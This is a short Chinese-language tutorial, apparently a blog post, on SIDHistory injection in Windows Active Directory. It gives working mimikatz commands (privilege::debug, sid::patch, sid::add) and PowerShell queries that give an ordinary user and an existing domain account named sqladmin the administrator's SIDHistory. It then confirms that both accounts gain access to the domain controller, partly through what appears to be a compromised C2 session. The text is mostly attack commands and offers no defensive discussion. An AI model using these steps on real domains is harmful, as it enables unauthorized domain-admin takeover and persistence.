前言

首先我们都知道在linux中有一个uid的值，用来区分用户组，在windows也有一个sid的值，和linux那个很像的，我们可以设置一个恶意用户的sid值为管理员，让他可以直接访问域控。

注：限域环境

复现

首先我们查看我新建的test2用户，看到SID值最后是1178证明，他是一个普通用户，然后下面的SIDHistrory的值是空，我们就是要设置SIDHistrory为管理员的sid

powershell -ExecutionPolicy Bypass -Command "& {Import-Module ActiveDirectory; Get-ADUser test2 -Properties sidhistory}"

这里我们还是使用mimikatz，注意用户名修改为自己要实验的用户名，这里看到回显的信息，我们知道他设置了sidhistory的值。

mimikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:test2 /new:administrator" "exit"

这里我们再次查看发现test2的SIDHistory值是管理员了，这里登录到test2看看是否有权限

果然如我们所料，直接有权限可以操纵目录

当然不止是可以修改新建用户，也可以搞一些域内的成员，还是先查看一下

shell powershell -ExecutionPolicy Bypass -Command "& {Import-Module ActiveDirectory; Get-ADUser sqladmin -Properties sidhistory}"

然后给sqladmin管理员权限，这里可以看到成功了

mimikatz privilege::debug 
mimikatz sid::patch
mimikatz sid::add /sam:sqladmin /new:administrator

这里用上线的sqladmin看看可以查看域控的目录，这里可以看到是有权限了